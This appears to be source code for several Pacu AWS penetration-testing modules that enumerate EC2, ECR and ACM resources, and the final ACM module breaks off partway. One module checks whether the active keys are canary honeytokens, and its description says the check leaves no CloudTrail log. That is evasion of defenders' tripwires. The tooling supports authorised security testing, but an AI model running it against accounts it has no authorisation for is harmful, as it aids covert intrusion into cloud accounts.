#!/usr/bin/env python3
import argparse
from copy import deepcopy
from random import choice


from pacu.core.lib import save
from botocore.exceptions import ClientError
from pacu.core.secretfinder.utils import regex_checker, Color


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'ec2__enum',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates a ton of relevant EC2 info.',

    # Description about what the module does and how it works
    'description': 'The module is used to enumerate the following EC2 data from a set of regions on an AWS account: instances, security groups, elastic IP addresses, VPN customer gateways, dedicated hosts, network ACLs, NAT gateways, network interfaces, route tables, subnets, VPCs, and VPC endpoints. By default, all data will be enumerated, but if any arguments are passed in indicating what data to enumerate, only that specific data will be enumerated.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['EC2'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': [
        '--regions',
        '--instances',
        '--security-groups',
        '--elastic-ips',
        '--public-ips',
        '--customer-gateways',
        '--dedicated-hosts',
        '--network-acls',
        '--nat-gateways',
        '--network-interfaces',
        '--route-tables',
        '--subnets',
        '--vpcs',
        '--vpc-endpoints',
        '--launch-templates',
    ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')
parser.add_argument('--instances', required=False, default=False, action='store_true', help='Enumerate EC2 instances')
parser.add_argument('--security-groups', required=False, default=False, action='store_true', help='Enumerate EC2 security groups')
parser.add_argument('--elastic-ips', required=False, default=False, action='store_true', help='Enumerate EC2 elastic IP addresses')
parser.add_argument('--public-ips', required=False, default=False, action='store_true', help='Enumerate EC2 public IP addresses')
parser.add_argument('--customer-gateways', required=False, default=False, action='store_true', help='Enumerate EC2 VPN customer gateways')
parser.add_argument('--dedicated-hosts', required=False, default=False, action='store_true', help='Enumerate EC2 dedicated hosts')
parser.add_argument('--network-acls', required=False, default=False, action='store_true', help='Enumerate EC2 network ACLs')
parser.add_argument('--nat-gateways', required=False, default=False, action='store_true', help='Enumerate EC2 NAT gateways')
parser.add_argument('--network-interfaces', required=False, default=False, action='store_true', help='Enumerate EC2 network interfaces')
parser.add_argument('--route-tables', required=False, default=False, action='store_true', help='Enumerate EC2 route tables')
parser.add_argument('--subnets', required=False, default=False, action='store_true', help='Enumerate EC2 subnets')
parser.add_argument('--vpcs', required=False, default=False, action='store_true', help='Enumerate EC2 VPCs')
parser.add_argument('--vpc-endpoints', required=False, default=False, action='store_true', help='Enumerate EC2 VPC endpoints')
parser.add_argument('--launch-templates', required=False, default=False, action='store_true', help='Enumerate EC2 launch templates')

ARG_FIELD_MAPPER = {
    'instances': 'Instances',
    'security_groups': 'SecurityGroups',
    'elastic_ips': 'ElasticIPs',
    'public_ips': 'PublicIPs',
    'customer_gateways': 'VPNCustomerGateways',
    'dedicated_hosts': 'DedicatedHosts',
    'network_acls': 'NetworkACLs',
    'nat_gateways': 'NATGateways',
    'network_interfaces': 'NetworkInterfaces',
    'route_tables': 'RouteTables',
    'subnets': 'Subnets',
    'vpcs': 'VPCs',
    'vpc_endpoints': 'VPCEndpoints',
    'launch_templates': 'LaunchTemplates',
}


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions

    if args.instances is False and args.security_groups is False and args.elastic_ips is False and args.public_ips is False and args.customer_gateways is False and args.dedicated_hosts is False and args.network_acls is False and args.nat_gateways is False and args.network_interfaces is False and args.route_tables is False and args.subnets is False and args.vpcs is False and args.vpc_endpoints is False and args.launch_templates is False:
        args.instances = args.security_groups = args.elastic_ips = args.public_ips = args.customer_gateways = args.dedicated_hosts = args.network_acls = args.nat_gateways = args.network_interfaces = args.route_tables = args.subnets = args.vpcs = args.vpc_endpoints = args.launch_templates = True

    if args.regions is None:
        regions = get_regions('ec2')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    client = pacu_main.get_boto3_client('ec2', choice(regions))

    all_instances = []
    all_security_groups = []
    all_elastic_ips = []
    all_public_ips = []
    all_vpn_customer_gateways = []
    all_dedicated_hosts = []
    all_network_acls = []
    all_nat_gateways = []
    all_network_interfaces = []
    all_route_tables = []
    all_subnets = []
    all_vpcs = []
    all_vpc_endpoints = []
    all_launch_templates = []
    for region in regions:
        instances = []
        security_groups = []
        elastic_ips = []
        public_ips = []
        vpn_customer_gateways = []
        dedicated_hosts = []
        network_acls = []
        nat_gateways = []
        network_interfaces = []
        route_tables = []
        subnets = []
        vpcs = []
        vpc_endpoints = []
        launch_templates = []

        if any([args.instances, args.security_groups, args.elastic_ips, args.public_ips, args.customer_gateways, args.dedicated_hosts, args.network_acls, args.nat_gateways, args.network_interfaces, args.route_tables, args.subnets, args.vpcs, args.vpc_endpoints, args.launch_templates]):
            print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('ec2', region)

        # Instances
        if args.instances:
            response = None
            next_token = False
            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_instances(
                            MaxResults=1000  # To prevent timeouts if there are too many instances
                        )
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeInstances.')
                        else:
                            print('  ' + code)
                        print('  Skipping instance enumeration...')
                        
                        break
                else:
                    response = client.describe_instances(
                        MaxResults=1000,
                        NextToken=next_token
                    )
                if 'NextToken' in response:
                    next_token = response['NextToken']
                for reservation in response['Reservations']:
                    for instance in reservation['Instances']:
                        instance['Region'] = region
                        instances.append(instance)
                        # Scan tags for secrets
                        scan_tags(instance)

            print('  {} instance(s) found.'.format(len(instances)))
            all_instances += instances

        # Security Groups
        if args.security_groups:
            response = None
            next_token = False
            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_security_groups(
                            MaxResults=1000
                        )
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeSecurityGroups.')
                        else:
                            print('  ' + code)
                        print('    Skipping security group enumeration...')
                        
                        break
                else:
                    response = client.describe_security_groups(
                        NextToken=next_token,
                        MaxResults=1000
                    )
                if 'NextToken' in response:
                    next_token = response['NextToken']
                for group in response['SecurityGroups']:
                    group['Region'] = region
                    security_groups.append(group)
            print('  {} security groups(s) found.'.format(len(security_groups)))
            all_security_groups += security_groups

        # Elastic IPs
        if args.elastic_ips:
            try:
                response = client.describe_addresses()
                for ip in response['Addresses']:
                    ip['Region'] = region
                    elastic_ips.append(ip)
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'UnauthorizedOperation':
                    print('  Access denied to DescribeAddresses.')
                else:
                    print('  ' + code)
                print('    Skipping elastic IP enumeration...')
                
            print('  {} elastic IP address(es) found.'.format(len(elastic_ips)))
            all_elastic_ips += elastic_ips

        # Public IPs
        if args.public_ips:
            p = 'ec2_public_ips_{}_{}.txt'.format(session.name, region)
            response = None
            next_token = False
            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_instances(MaxResults=1000)
                        for reservation in response['Reservations']:
                            for instance in reservation['Instances']:
                                public = instance.get("PublicIpAddress")
                                if public:                                      
                                    public_ips.append(public)
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeInstances.')
                        else:
                            print('  ' + code)
                        print('  Skipping public IP enumeration...')
                        
                        break
                else:
                    response = client.describe_instances(MaxResults=1000,NextToken=next_token)
                    for reservation in response['Reservations']:
                        for instance in reservation['Instances']:
                            public = instance["PublicIpAddress"]
                            if public:
                                public_ips.append(public)
                if 'NextToken' in response:
                    next_token = response['NextToken']    
            if len(public_ips) > 0:
                with save(p, 'w+') as f:    
                    for public in public_ips:
                        f.write('{}\n'.format(public))
                print('  {} publics IP address(es) found and added to text file located at: ~/.local/share/pacu/{}/downloads/{}'.format(len(public_ips),session.name,p))                
            all_public_ips += public_ips

        # VPN Customer Gateways
        if args.customer_gateways:
            try:
                response = client.describe_customer_gateways()
                for gateway in response['CustomerGateways']:
                    gateway['Region'] = region
                    vpn_customer_gateways.append(gateway)
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'UnauthorizedOperation':
                    print('  Access denied to DescribeCustomerGateways.')
                else:
                    print('  ' + code)
                print('    Skipping VPN customer gateway enumeration...')
                
            print('  {} VPN customer gateway(s) found.'.format(len(vpn_customer_gateways)))
            all_vpn_customer_gateways += vpn_customer_gateways

        # Dedicated Hosts
        if args.dedicated_hosts:
            response = None
            next_token = False
            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_hosts(
                            MaxResults=500
                        )
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeHosts.')
                        else:
                            print('  ' + code)
                        print('    Skipping dedicated host enumeration...')
                        
                        break
                else:
                    response = client.describe_hosts(
                        NextToken=next_token,
                        MaxResults=500
                    )
                if 'NextToken' in response:
                    next_token = response['NextToken']
                for host in response['Hosts']:
                    host['Region'] = region
                    dedicated_hosts.append(host)
            print('  {} dedicated host(s) found.'.format(len(dedicated_hosts)))
            all_dedicated_hosts += dedicated_hosts

        # Network ACLs
        if args.network_acls:
            try:
                response = client.describe_network_acls()
                for acl in response['NetworkAcls']:
                    acl['Region'] = region
                    network_acls.append(acl)
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'UnauthorizedOperation':
                    print('  Access denied to DescribeNetworkACLs.')
                else:
                    print('  ' + code)
                print('    Skipping network ACL enumeration...')
                
            print('  {} network ACL(s) found.'.format(len(network_acls)))
            all_network_acls += network_acls

        # NAT Gateways
        if args.nat_gateways:
            response = None
            next_token = False
            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_nat_gateways(
                            MaxResults=1000
                        )
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeNATGateways.')
                        else:
                            print('  ' + code)
                        print('    Skipping NAT gateway enumeration...')
                        
                        break
                else:
                    response = client.describe_nat_gateways(
                        NextToken=next_token,
                        MaxResults=1000
                    )
                if 'NextToken' in response:
                    next_token = response['NextToken']
                for gateway in response['NatGateways']:
                    gateway['Region'] = region
                    nat_gateways.append(gateway)
            print('  {} NAT gateway(s) found.'.format(len(nat_gateways)))
            all_nat_gateways += nat_gateways

        # Network Interfaces
        if args.network_interfaces:
            try:
                response = client.describe_network_interfaces()
                for interface in response['NetworkInterfaces']:
                    interface['Region'] = region
                    network_interfaces.append(interface)
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'UnauthorizedOperation':
                    print('  Access denied to DescribeNetworkInterfaces.')
                else:
                    print('  ' + code)
                print('    Skipping network interface enumeration...')
                
            print('  {} network interface(s) found.'.format(len(network_interfaces)))
            all_network_interfaces += network_interfaces

        # Route Tables
        if args.route_tables:
            try:
                response = client.describe_route_tables()
                for table in response['RouteTables']:
                    table['Region'] = region
                    route_tables.append(table)
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'UnauthorizedOperation':
                    print('  Access denied to DescribeRouteTables.')
                else:
                    print('  ' + code)
                print('    Skipping route table enumeration...')
                
            print('  {} route table(s) found.'.format(len(route_tables)))
            all_route_tables += route_tables

        # Subnets
        if args.subnets:
            try:
                response = client.describe_subnets()
                for subnet in response['Subnets']:
                    subnet['Region'] = region
                    subnets.append(subnet)
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'UnauthorizedOperation':
                    print('  Access denied to DescribeSubnets.')
                else:
                    print('  ' + code)
                print('    Skipping subnet enumeration...')
                
            print('  {} subnet(s) found.'.format(len(subnets)))
            all_subnets += subnets

        # VPCs
        if args.vpcs:
            try:
                response = client.describe_vpcs()
                for vpc in response['Vpcs']:
                    vpc['Region'] = region
                    vpcs.append(vpc)
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'UnauthorizedOperation':
                    print('  Access denied to DescribeVPCs.')
                else:
                    print('  ' + code)
                print('    Skipping VPC enumeration...')
                
            print('  {} VPC(s) found.'.format(len(vpcs)))
            all_vpcs += vpcs

        # VPC Endpoints
        if args.vpc_endpoints:
            response = None
            next_token = False
            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_vpc_endpoints(
                            MaxResults=1000
                        )
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeVPCEndpoints.')
                        else:
                            print('  ' + code)
                        print('    Skipping VPC endpoint enumeration...')
                        
                        break
                else:
                    response = client.describe_vpc_endpoints(
                        NextToken=next_token,
                        MaxResults=1000
                    )
                if 'NextToken' in response:
                    next_token = response['NextToken']
                for endpoint in response['VpcEndpoints']:
                    endpoint['Region'] = region
                    vpc_endpoints.append(endpoint)
            print('  {} VPC endpoint(s) found.'.format(len(vpc_endpoints)))
            all_vpc_endpoints += vpc_endpoints

        # Launch Templates
        if args.launch_templates:
            response = None
            next_token = False
            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_launch_templates()
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeLaunchTemplates.')
                        else:
                            print('  ' + code)
                        print('    Skipping launch template enumeration...')
                        
                        break
                else:
                    response = client.describe_launch_templates(
                        NextToken=next_token
                    )
                if 'NextToken' in response:
                    next_token = response['NextToken']
                for template in response['LaunchTemplates']:
                    template['Region'] = region
                    launch_templates.append(template)
            print('  {} launch template(s) found.'.format(len(launch_templates)))
            all_launch_templates += launch_templates

    gathered_data = {
        'Instances': all_instances,
        'SecurityGroups': all_security_groups,
        'ElasticIPs': all_elastic_ips,
        'PublicIPs': all_public_ips,
        'VPNCustomerGateways': all_vpn_customer_gateways,
        'DedicatedHosts': all_dedicated_hosts,
        'NetworkACLs': all_network_acls,
        'NATGateways': all_nat_gateways,
        'NetworkInterfaces': all_network_interfaces,
        'RouteTables': all_route_tables,
        'Subnets': all_subnets,
        'VPCs': all_vpcs,
        'VPCEndpoints': all_vpc_endpoints,
        'LaunchTemplates': all_launch_templates,
    }

    for var in vars(args):
        if var == 'regions':
            continue
        if not getattr(args, var):
            del gathered_data[ARG_FIELD_MAPPER[var]]

    ec2_data = deepcopy(session.EC2)
    for key, value in gathered_data.items():
        ec2_data[key] = value
    session.update(pacu_main.database, EC2=ec2_data)

    # Add regions to gathered_data for summary output
    gathered_data['regions'] = regions

    if any([args.instances, args.security_groups, args.elastic_ips, args.customer_gateways, args.dedicated_hosts, args.network_acls, args.nat_gateways, args.network_interfaces, args.route_tables, args.subnets, args.vpcs, args.vpc_endpoints, args.launch_templates]):
        return gathered_data
    else:
        print('No data successfully enumerated.\n')
        return None

def scan_tags(instance):
    try:
        tags = instance['Tags']
        [Color.print(Color.GREEN, '\tTag discovered {}: {}'.format(tag["Key"], tag["Value"] )) for tag in tags if regex_checker(tag['Value'])]

    except KeyError:
        return

def summary(data, pacu_main):
    results = []

    results.append('  Regions:')
    for region in data['regions']:
        results.append('     {}'.format(region))

    results.append('')

    if 'Instances' in data:
        results.append('    {} total instance(s) found.'.format(len(data['Instances'])))

    if 'SecurityGroups' in data:
        results.append('    {} total security group(s) found.'.format(len(data['SecurityGroups'])))

    if 'ElasticIPs' in data:
        results.append('    {} total elastic IP address(es) found.'.format(len(data['ElasticIPs'])))

    if 'PublicIPs' in data:
        results.append('    {} total public IP address(es) found.'.format(len(data['PublicIPs'])))

    if 'VPNCustomerGateways' in data:
        results.append('    {} total VPN customer gateway(s) found.'.format(len(data['VPNCustomerGateways'])))

    if 'DedicatedHosts' in data:
        results.append('    {} total dedicated hosts(s) found.'.format(len(data['DedicatedHosts'])))

    if 'NetworkACLs' in data:
        results.append('    {} total network ACL(s) found.'.format(len(data['NetworkACLs'])))

    if 'NATGateways' in data:
        results.append('    {} total NAT gateway(s) found.'.format(len(data['NATGateways'])))

    if 'NetworkInterfaces' in data:
        results.append('    {} total network interface(s) found.'.format(len(data['NetworkInterfaces'])))

    if 'RouteTables' in data:
        results.append('    {} total route table(s) found.'.format(len(data['RouteTables'])))

    if 'Subnets' in data:
        results.append('    {} total subnets(s) found.'.format(len(data['Subnets'])))

    if 'VPCs' in data:
        results.append('    {} total VPC(s) found.'.format(len(data['VPCs'])))

    if 'VPCEndpoints' in data:
        results.append('    {} total VPC endpoint(s) found.'.format(len(data['VPCEndpoints'])))

    if 'LaunchTemplates' in data:
        results.append('    {} total launch template(s) found.'.format(len(data['LaunchTemplates'])))

    return '\n'.join(results)



#!/usr/bin/env python3
import argparse
import json
from copy import deepcopy
from botocore.exceptions import ClientError
import time

from pacu.core.lib import downloads_dir

module_info = {
    'name': 'ecr__enum',
    'author': 'Manas Bellani',
    'category': 'ENUM',
    'one_liner': 'Enumerates repostories and relevant images/tags ',
    'description': 'This module enumerates information about all ECR images and repositories within Elastic Container Registry (ECR). It writes the JSON results found to "Downloads" folder within sessions folder',
    'services': ['API.ECR'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--regions'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')

def main(args, pacu_main):
    session = pacu_main.get_active_session()

    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions

    # Get a list of all regions from which to get ECR data
    regions = args.regions.split(',') if args.regions else get_regions('all')

    summary_data = {}

    # Initialize data
    summary_data['ecr'] = {}
    summary_data['ecr']['regions'] = {}

    # Prepare output file to store ECR data
    now = time.time()
    outfile_path = str(downloads_dir()/f"ecr_enum_{now}.json")

    # Loop through each region to get ECR data one-by-one
    for region in regions:

        #  Keep count of ECR repos
        num_repos_found = 0

        # Maintain a regional count of ECR repositories and images
        region_repositories = []
        region_images = []

        print('Checking region {} for ECR Repositories...'.format(region))
        client = pacu_main.get_boto3_client('ecr', region)

        # Get all the ECR repositories for the region
        response = {}
        try:
            response = client.describe_repositories()
            region_repositories.extend(response['repositories'])
            while 'nextToken' in response:
                response = client.describe_repositories(
                    nextToken=response['nextToken']
                )
                region_repositories.extend(response['repositories'])

            # Assuming we get any ECR repositories for the region
            if region_repositories:

                # Count the number of repositories found
                num_repos_found += len(region_repositories)

                # Extract the repository name for this region's repository
                repo_names = [repo_info['repositoryName'] for repo_info in region_repositories]

                # Extract each image for the repository by repo name
                for repo_name in repo_names:
                    response = client.describe_images(
                        repositoryName=repo_name
                    )
                    region_images.extend(
                        response['imageDetails']
                    )
                    while 'nextToken' in response:
                        response = client.describe_images(
                            repositoryName=repo_name,
                            nextToken=response['nextToken']
                        )
                        region_images.extend(
                            response['imageDetails']
                        )

                # Let the user know how many repos we have found
                print("Number of repos found for region, {}: {}".format(
                        region,
                        len(region_repositories)
                    )
                )

                # Count number of images discovered for this region
                if region_images:
                    print("Number of images found for ALL repos in region, {}: {}".format(
                            region,
                            len(region_images)
                        )
                    )

                # Adding repositories to region for extraction ater on
                summary_data['ecr']['regions'][region] = {}
                summary_data['ecr']['regions'][region]['num_repos_found'] = num_repos_found
                summary_data['ecr']['regions'][region]['repositories'] = region_repositories
                summary_data['ecr']['regions'][region]['repo_images'] = region_images

        except Exception as err:
            print('No ECR repositories retrieved for region: {}'.format(region))
            print('Error class: {}, Error message: {}'.format(err.__class__, str(err)))

    # Write all the data to the output file
    print("Writing all ECR results to file: {}".format(outfile_path))
    with open(outfile_path, "w+") as f:
        f.write(
            json.dumps(summary_data, indent=4, default=str)
        )

    return summary_data

def summary(data, pacu_main):
    out = ''
    for region, region_info in data['ecr']['regions'].items():
        out += 'Num of ECR repos found: {} in region: {} \n'.format(
            region_info['num_repos_found'],
            region
        )
    return out



#!/usr/bin/env python3
import argparse
import re
from botocore.exceptions import ClientError


module_info = {
    'name': 'iam__detect_honeytokens',

    'author': 'Spencer Gietzen of Rhino Security Labs',

    'category': 'ENUM',

    'one_liner': 'Checks if the active set of keys are known to be honeytokens.',

    'description': 'This module checks if the active set of keys are known to be honeytokens and in the process, it enumerates some identifying information about the keys. All of this is done without ever leaving a log in CloudTrail, because it uses AWS SNS for enumeration, which CloudTrail does not support. Note: Even if you know your keys are not honey keys, this module can be used to enumerate information like the account ID, user/role path, user/role name, and role session name if there is one.',

    'services': ['IAM', 'SNS'],

    'prerequisite_modules': [],

    'external_dependencies': [],

    'arguments_to_autocomplete': ['--region'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--region', required=False, default='us-east-1', help='If for some reason you want to target a specific region for the SNS API call. This shouldn\'t ever matter, because the API call is not logged to CloudTrail. The default is "us-east-1".')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### These can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    ######

    data = {}

    client = pacu_main.get_boto3_client('sns', args.region)

    print('Making test API request...\n')

    try:
        client.publish(
                Message="foo", 
                PhoneNumber="1"
        )

        data['summary'] = 'API call was successful! This means you have the SNS Publish permission and we could not get your ARN from the API call.'
    except ClientError as error:
        if error.response['Error']['Code'] == 'AuthorizationError':
            message = error.response['Error']['Message']

            if 'canarytokens.com' in message or 'canarytokens.org' in message:
                data['summary'] = 'WARNING: Keys are confirmed honeytoken keys from Canarytokens.org! Do not use them!'
            elif 'arn:aws:iam::' in message and '/SpaceCrab/' in message:
                data['summary'] = 'WARNING: Keys are confirmed honeytoken keys from SpaceCrab! Do not use them!'
            elif 'arn:aws:iam::534261010715:' in message or 'arn:aws:sts::534261010715:' in message:
                data['summary'] = 'WARNING: Keys belong to an AWS account owned by Canarytokens.org! Do not use them!'
            elif re.search('[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}', message): #spacesiren is using "str(uuid.uuid4())" to generate user names at the time of writing
                data['summary'] = 'WARNING: Keys appear to be generated by SpaceSiren (they match a uuid regex)! Please use caution!'
            else:
                data['summary'] = 'Keys appear to be real (not honeytoken keys)!'
            
            match = re.search(r'User: arn:.* is not authorized to perform', message)
            if match:
                data['arn'] = match.group().split(' ')[1]

                active_aws_key = session.get_active_aws_key(pacu_main.database)

                if ':assumed-role/' in data['arn']:
                    active_aws_key.update(
                        pacu_main.database,
                        arn=data['arn'],
                        account_id=data['arn'].split('arn:aws:sts::')[1][:12],
                        # -2 will get the role name everytime,
                        # even if there is a role path and
                        # session name
                        role_name=data['arn'].split(':assumed-role/')[1].split('/')[-2]
                    )
                elif ':user/' in data['arn']:
                    active_aws_key.update(
                        pacu_main.database,
                        arn=data['arn'],
                        account_id=data['arn'].split('arn:aws:iam::')[1][:12],
                        # -1 will get the user name everytime,
                        # even if there is a user path
                        user_name=data['arn'].split(':user/')[1].split('/')[-1]
                    )
        else:
            data['summary'] = '  Unhandled error received: {}'.format(error.response['Error']['Code'])

    print('  {}\n'.format(data['summary']))

    return data


def summary(data, pacu_main):
    out = ''
    if 'summary' in data.keys():
        out += '  {}\n'.format(data['summary'])
    if 'arn' in data.keys():
        out += '\n  Full ARN for the active keys (saved to database as well):\n\n    {}\n\n'.format(data['arn'])
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError


# When writing a module, feel free to remove any comments, placeholders, or
# anything else that doesn't relate to your module.

module_info = {
    # Name of the module (should be the same as the filename).
    'name': 'template',

    # Name and any other notes about the author.
    'author': 'You of your company',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'category_name',

    # One liner description of the module functionality. This shows up when a
    # user searches for modules.
    'one_liner': 'Does this thing.',

    # Full description about what the module does and how it works.
    'description': 'This module does this thing by using xyz and outputs info to abc. Here is a note also.',

    # A list of AWS services that the module utilizes during its execution.
    'services': ['EC2'],

    # For prerequisite modules, try and see if any existing modules return the
    # data that is required for your module before writing that code yourself;
    # that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either
    # a GitHub URL (must end in .git), or a single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab.
    'arguments_to_autocomplete': [],
}

# Every module must include an ArgumentParser named "parser", even if it
# doesn't use any additional arguments.
parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

# The two add_argument calls are placeholders for arguments. Change as needed.
# Arguments that accept multiple options, such as --usernames, should be
# comma-separated. For example:
#     --usernames user_a,userb,UserC
# Arguments that are region-specific, such as --instance-ids, should use
# an @ symbol to separate the data and its region; for example:
#     --instance-ids 123@us-west-1,54252@us-east-1,9999@ap-south-1
# Make sure to add all arguments to module_info['arguments_to_autocomplete']
parser.add_argument('', help='')
parser.add_argument('', required=False, default=None, help='')


# Main is the first function that is called when this module is executed.
def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### These can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    key_info = pacu_main.key_info
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions
    install_dependencies = pacu_main.install_dependencies
    ######

    # Use the print and input functions as you normally would. They have been
    # modified to log the data to a history file as well as to the console.

    # key_info fetches information for the currently active set of keys. This
    # returns a dictionary containing information about the AWS key using the
    # session's current key_alias, which includes info like User Name,
    # User Arn, User Id, Account Id, the permissions collected so far for the
    # user, the groups they are a part of, access key id, secret access key,
    # session token, key alias, and a note.
    user = key_info()

    # fetch_data is used when there is a prerequisite module to the current
    # module. The example below shows how to fetch all EC2 security group data
    # to use in this module.
    # This check will be false if the user declines to run the pre-requisite
    # module or it fails. Depending on the module, you may still want to
    # continue execution, so building the check is on you as a developer.
    if fetch_data(['EC2', 'SecurityGroups'], 'ec2__enum', '--security-groups') is False:
        print('Pre-req module not run successfully. Exiting...')
        return

    sec_groups = session.EC2['SecurityGroups']

    # Attempt to install the required external dependencies, exit this module
    # if the download/install fails
    if not install_dependencies(module_info['external_dependencies']):
        return

    # Use the get_regions function to fetch an array of supported regions for
    # the service that you pass into it.
    regions = get_regions('EC2')

    for region in regions:
        print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('aws_service', region)
        data = client.do_something()

    # Make sure your main function returns whatever data you need to construct
    # a module summary string.
    return data


# The summary function will be called by Pacu after running main, and will be
# passed the data returned from main. It should return a single string
# containing a curated summary of every significant thing that the module did,
# whether successful or not; or None if the module exited early and made no
# changes that warrant a summary being displayed. The data parameter can
# contain whatever data is needed in any structure desired. A length limit of
# 1000 characters is enforced on strings returned by module summary functions.
def summary(data, pacu_main):
    if 'some_relevant_key' in data.keys():
        return 'This module compromised {} instances in the SomeRelevantKey service.'.format(len(data['some_relevant_key']))
    else:
        return 'No instances of the SomeRelevantKey service were compromised.'



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import copy
import string
import random
import json
import time

from pacu.core.lib import downloads_dir

module_info = {
    'name': 'acm__enum',
    'author': 'Manas Bellani',
    'category': 'ENUM',
    'one_liner': 'Enumerate Information about the AWS Certificate Manager',
    'description': 'This module is used to list and get information about ACM certificates, list expired certificates, and get info about private CAs which can generate certs. Expired certificates can provide an opportunity for takeover if domain has expired OR can be abused for client interaction as well. All certs, cert chains, CAs discovered is written to \"downloads\" folder in relevant \'sessions\' folder',
    'services': ['ACM'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--regions', '--all', '--certs-list', '--certs-chain',
        '--certs-info', '--certs-expired-list', '--ca-list'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--regions', required=False, default='all',
    help='Regions to enumerate ACM in (defaults to "all" session regions)')
parser.add_argument('--all', action='store_true', help="Get all info from ACM")
parser.add_argument('--certs-list',  action="store_true",
    help="Get list about all certs")
parser.add_argument('--certs-info',  action="store_true",
    help="Get info about each certificate")
parser.add_argument('--certs-chain',  action="store_true",
    help="Get certs and the certificate chain as well")
parser.add_argument('--certs-expired-list', action='store_true',
    help="List expired certificates which could potentially be taken over")
parser.add_argument('--ca-list', action='store_true',
    help="List private certificate authorities created within ACM")


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions

    data = {'num_certs': 0, 'certs': {}, 'certs_info': {}, 'certs_chain': {},
            'num_cas': 0, 'cas': {},
            'num_certs_expired': 0, 'certs_expired': {}}

    # Get the regions to check
    if args.regions == "all":
        regions = get_regions('all')
    else:
        regions = args.regions.split(',')

    for region in regions:

        # Get the ACM client for the region
        client = pacu_main.get_boto3_client('acm', region)
        ca_client = pacu_main.get_boto3_client('acm-pca', region)

        if args.all or args.certs_list:

            # To get to each certs page
            next_token = None
            finished = False

            certs_list = []
            while not finished:
                try:
                    print("Listing ACM certificate ARNs for region: {}".format(region))
                    if next_token:
